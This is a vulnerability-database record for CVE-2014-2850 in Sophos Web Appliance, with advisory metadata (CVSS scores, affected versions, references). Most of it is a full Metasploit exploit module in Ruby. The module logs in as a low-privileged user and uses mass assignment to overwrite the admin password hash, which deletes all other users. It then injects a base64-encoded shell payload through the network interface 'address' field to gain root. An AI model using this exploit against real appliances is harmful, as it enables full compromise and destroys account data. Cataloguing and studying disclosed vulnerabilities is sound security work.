var-201404-0453
Vulnerability from variot
The network interface configuration page (netinterface) in Sophos Web Appliance before 3.8.2 allows remote administrators to execute arbitrary commands via shell metacharacters in the address parameter. Sophos Web Appliance is prone to a privilege-escalation vulnerability and a remote code-execution vulnerability. Attackers can leverage these issues to gain root privileges and execute arbitrary code; successful exploitation results in the complete compromise of affected appliances. Versions prior to Sophos Web Appliance 3.8.2 are vulnerable. The product provides real-time network threat protection, custom web filtering and dynamic application control.

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Sophos Web Protection Appliance Interface Authenticated Arbitrary Command Execution',
      'Description' => %q{
        This module takes advantage of two vulnerabilities in order to gain remote code execution as root
        as an otherwise non-privileged authorized user. By taking advantage of a mass assignment
        vulnerability that allows an unprivileged authenticated user to change the administrator's
        password hash, the module updates the password to login as the admin to reach the second vulnerability.
        No server-side sanitization is done on values passed when configuring a static network interface.
        This module will inadvertently delete any other users that may have been present as a side effect
        of changing the admin's password.
      },
      'Author'      =>
        [
          'Brandon Perry <bperry.volatile@gmail.com>' # discovery and Metasploit module
        ],
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          ['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-14-069/']
        ],
      'Platform'    => ['unix'],
      'Arch'        => ARCH_CMD,
      'Privileged'  => true,
      'Payload'     =>
        {
          'Space'       => 500,
          'DisableNops' => true,
          'BadChars'    => "", # base64 encoding ftw!
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic telnet'
            }
        },
      'Targets'     =>
        [
          [ 'Sophos Web Protection Appliance 3.8.1.1', { }]
        ],
      'DefaultOptions' =>
        {
          'SSL' => true
        },
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Apr 8 2014'
    ))

    register_options(
      [
        OptString.new('USERNAME', [true, 'The username to authenticate as', nil]),
        OptString.new('PASSWORD', [true, 'The password to authenticate with', nil]),
        OptString.new('TARGETURI', [true, 'The target URI', '/']),
        Opt::RPORT(443)
      ],
      self.class
    )
  end

  def exploit
    # Fetch the login page to recover the per-session STYLE form token
    init = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'index.php')
    })

    if !init or !init.body
      fail_with("Could not connect to host")
    end

    print_status("Getting STYLE key...")

    style = ''
    init.body.each_line do |line|
      next if line !~ /name="STYLE" value="(.*)"/
      style = $1
    end

    if style == ''
      fail_with("Could not find style key.")
    end

    # Log in as the low-privileged user supplied in USERNAME/PASSWORD
    post = {
      'STYLE'       => style,
      'destination' => '',
      'section'     => '',
      'username'    => datastore['USERNAME'],
      'password'    => datastore['PASSWORD']
    }

    print_status("Authenticating as " + datastore['USERNAME'])
    login = send_request_cgi({
      'uri'       => normalize_uri(target_uri.path, '/index.php?c=login'),
      'method'    => 'POST',
      'vars_post' => post
    })

    if !login or login.code != 200 or login.body !~ /#{datastore['USERNAME']}<\/a>/
      fail_with("Authentication failed")
    end

    # I don't know what salt is being used to hash these
    # passwords (probably in js somewhere), so I have
    # to use a static one that I saw being POSTed while
    # exploring, it is 'notpassword'.
    #
    # This will actually delete every other user that exists
    # except for admin, whose password will be changed
    #
    # whoops
    admin_hash = '[{"id": "default_admin", "username": "admin", "name": "Default Administrator"'
    admin_hash << ', "password": "70ec23d3e019a307081732c0162b2733", "description": "Default '
    admin_hash << 'Administrator Account", "admin": true, "roles": ["admin"], "reporting_groups"'
    admin_hash << ': [], "user_id": 0}]'

    # Mass assignment: the 'admins' field is accepted from a non-admin user
    post = {
      'action'   => 'save',
      'STYLE'    => style,
      'username' => Rex::Text.uri_encode(Rex::Text.encode_base64(datastore['USERNAME'])),
      'current'  => Rex::Text.uri_encode(Rex::Text.encode_base64(datastore['PASSWORD'])),
      'new'      => Rex::Text.uri_encode(Rex::Text.encode_base64(datastore['PASSWORD'])),
      'admins'   => admin_hash
    }

    print_status("Changing old password hash to notpassword")
    passchange = send_request_cgi({
      'uri'       => normalize_uri(target_uri.path, '/index.php?c=change_password'),
      'method'    => 'POST',
      'vars_post' => post
    })

    if !passchange or passchange.code != 200
      fail_with("Couldn't update admin's password")
    end

    print_status("Logging in as the admin now")
    init = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'index.php')
    })

    if !init or init.code != 200
      fail_with("Couldn't reget index page for admin auth")
    end

    init.body.each_line do |line|
      next if line !~ /name="STYLE" value="(.*)"/
      style = $1
    end

    post = {
      'STYLE'       => style,
      'destination' => '',
      'section'     => '',
      'username'    => 'admin',
      'password'    => 'notpassword'
    }

    login = send_request_cgi({
      'uri'       => normalize_uri(target_uri.path, 'index.php?c=login'),
      'method'    => 'POST',
      'vars_post' => post
    })

    if !login or login.code != 200 or login.body !~ /admin<\/a>/
      fail_with("Couldn't login as admin")
    end

    # Command injection: the static-interface 'address' value reaches a shell unsanitized
    pay = Rex::Text.uri_encode(Rex::Text.encode_base64(payload.encoded))
    post = {
      'STYLE'       => style,
      'dhcp'        => 'no',
      'address'     => "192.16`echo #{pay}|base64 --decode|sh`8.1.16",
      'gateway'     => '192.168.1.254',
      'sb_bridge'   => 'explicit',
      'netmask'     => '255.255.255.0',
      'sb_linktype' => 'auto',
      'dns'         => 'yes',
      'dns1'        => '192.168.1.254',
      'dns2'        => '',
      'dns3'        => ''
    }

    print_status("Sending payload")
    send_request_cgi({
      'uri'       => normalize_uri(target_uri.path, 'index.php?c=netinterface'),
      'method'    => 'POST',
      'vars_post' => post,
    })
  end
end
Record details (VARIoT entry VAR-201404-0453, last updated 2024-11-23T22:08:21.313000Z)

CVE: CVE-2014-2850
Title (JVNDB): Sophos Web Appliance Arbitrary command execution vulnerability in the network interface settings page
Problem type: CWE-78; CNNVD type: operating system command injection; threat type: remote
Credits: Brandon Perry (BID 66734, Packet Storm 126099)
IoT-related: yes

CVSS v2 (nvd@nist.gov, also VULHUB): base score 8.5 (HIGH), vector AV:N/AC:M/Au:S/C:C/I:C/A:C, exploitability subscore 6.8, impact subscore 10.0. Severity rated HIGH by NVD, CNNVD and VULHUB. No CVSS v3 data.

Affected products:
- CPE (CVE data version 4.0, operator OR): cpe:/h:sophos:web_appliance, cpe:/o:sophos:web_appliance_firmware
- NVD lists Sophos Web Appliance 3.x releases individually from 3.0.0 through 3.8.1, plus a range entry "lte 3.8.1.1"
- JVNDB: Sophos Web Appliance "lt 3.8.2"; BID: 3.0

Patch: Sophos knowledgebase article 120230, http://www.sophos.com/en-us/support/knowledgebase/120230.aspx

External IDs: NVD CVE-2014-2850; BID 66734; ZDI ZDI-14-069; EXPLOIT-DB 32789; SECUNIA 57706; JVNDB JVNDB-2014-002001; CNNVD CNNVD-201404-158; SEEBUG SSVID-86059; VULHUB VHN-70789; PACKETSTORM 126099

Exploit availability: https://www.scap.org.cn/vuln/vhn-70789 (VULHUB, type unknown)

References:
- http://www.securityfocus.com/bid/66734
- http://www.sophos.com/en-us/support/knowledgebase/120230.aspx
- http://www.exploit-db.com/exploits/32789
- http://www.zerodayinitiative.com/advisories/zdi-14-069/
- http://secunia.com/advisories/57706
- http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-2850
- http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-2850
- https://github.com/rapid7/metasploit-framework

Sources, with release and update dates:
- VULHUB VHN-70789: released 2014-04-11, updated 2014-04-14
- BID 66734: released 2014-04-08, updated 2014-04-17T01:09:00
- JVNDB JVNDB-2014-002001: released 2014-04-16, updated 2014-04-16
- PACKETSTORM 126099: released 2014-04-09T23:53:40
- CNNVD CNNVD-201404-158: released 2014-04-15, updated 2014-04-15
- NVD CVE-2014-2850: released 2014-04-11T15:55:27.693000, updated 2024-11-21T02:07:03.210000